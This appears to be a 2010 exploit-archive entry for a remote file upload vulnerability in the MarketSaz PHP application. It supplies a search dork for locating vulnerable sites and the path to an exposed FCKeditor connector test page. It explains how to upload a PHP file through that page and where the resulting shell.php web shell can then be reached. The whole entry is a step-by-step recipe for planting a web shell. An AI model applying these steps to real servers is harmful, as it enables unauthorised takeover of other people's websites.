MarketSaz remote file Upload Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MarketSaz remote file Upload Vulnerability
# Published : 2010-06-18
# Author : NetQurd
# Previous Title : Joomla Component Listbingo 1.3 Multiple Vulnerabilities
# Next Title : Banner Management Script SQL Injection

==========================================
MarketSaz remote file Upload Vulnerability
==========================================


#Exploit Title: MarketSaz remote file uploade

#Author: NetQurd (NetQurd@Live.com)

#Dork : English = Powered MarketSaz


#Software Link: http://www.marketsaz.com

#Platform :linux/php

#Exploit : http://target.com

#http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#Example site: http://server

#Select the "File Upload" To use = php

#http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php

#OR

#http://server/shell.php
# Spical Thanks To Net.Edit0r (Net.Edit0r@att.net)